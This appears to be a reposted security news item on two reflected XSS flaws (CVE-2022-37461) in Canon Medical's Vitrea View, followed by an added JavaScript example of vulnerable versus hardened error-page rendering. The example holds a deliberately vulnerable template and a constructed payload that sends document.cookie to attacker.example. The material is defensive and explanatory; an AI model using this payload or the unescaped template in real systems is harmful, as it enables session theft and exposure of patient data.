"XSS Flaw in Prevalent Media Imaging Tool Exposes Trove of Patient Data"

Canon Medical's Vitrea View is a widely used tool for securely sharing medical images among radiologists, physicians, and other providers on a patient's care team. Researchers at Trustwave SpiderLabs have disclosed two vulnerabilities in it, collectively tracked as CVE-2022-37461, that could give an attacker access to far more than X-rays. The first is an unauthenticated reflected cross-site scripting (XSS) flaw in an error message; the second is a separate reflected XSS in the Vitrea View admin panel. According to the researchers, successful exploitation could let an attacker retrieve patient information, stored images, or scans, and modify information, depending on the privileges of the session in which the script runs. Sensitive information and credentials for other services integrated with Vitrea View could also be exposed. The vulnerabilities were reported to Canon Medical, which has released a patch; the researchers recommend that organizations running the tool apply it immediately.
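The following is an added illustration of the vulnerability class described above (a reflected XSS in a server-generated error page), not code from Vitrea View, Canon Medical, or the Trustwave advisory. The error template, the `escapeHtml` helper, the payload, the header values, and the crude `containsActiveContent` check are all assumptions made for the example; the real vulnerable endpoint and payload are not published on this page.

```javascript
// Added example: reflected XSS in an error message, vulnerable rendering
// beside a hardened one. Hypothetical code; not Vitrea View's own.

// Minimal HTML escaper for text content and double-quoted attribute values.
// A single regex pass avoids double-escaping the '&' it emits.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[c]);
}

// Vulnerable: the requested path is echoed straight into the error body, so
// anything an attacker can place in a link lands in the page as markup.
function renderErrorVulnerable(requestedPath) {
  return `<html><body><h1>404</h1><p>No such resource: ${requestedPath}</p></body></html>`;
}

// Hardened: same template with output encoding, plus response headers that
// stop inline script from running even if one encoding is missed. The CSP
// value is an assumed baseline, not a setting from the patched product.
function renderErrorHardened(requestedPath) {
  const body = `<html><body><h1>404</h1><p>No such resource: ${escapeHtml(requestedPath)}</p></body></html>`;
  const headers = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
  };
  return { body, headers };
}

// Demonstration-only detector: would the browser see a <script> element or an
// inline event-handler attribute in this HTML?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

// Constructed payload of the kind an attacker would embed in a crafted link
// sent to a logged-in user. It is not the reported Vitrea View payload.
const PAYLOAD = '/viewer/<script>fetch("https://attacker.example/?c="+document.cookie)</script>';

// Returns whether each rendering leaves the payload executable.
function demo() {
  const vulnerable = renderErrorVulnerable(PAYLOAD);
  const hardened = renderErrorHardened(PAYLOAD);
  return {
    vulnerableExecutes: containsActiveContent(vulnerable),
    hardenedExecutes: containsActiveContent(hardened.body),
  };
}

console.log(demo());
```

The point the advisory makes about "privileges used during the session" is visible here: the reflected script runs in the victim's origin with the victim's session, so what it can read or change is whatever that user (or admin, for the admin-panel variant) can reach. Output encoding at the template fixes the bug; the CSP and `nosniff` headers are defense in depth for the next missed sink.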


Dark Reading reports: "XSS Flaw in Prevalent Media Imaging Tool Exposes Trove of Patient Data"

Submitted by Anonymous on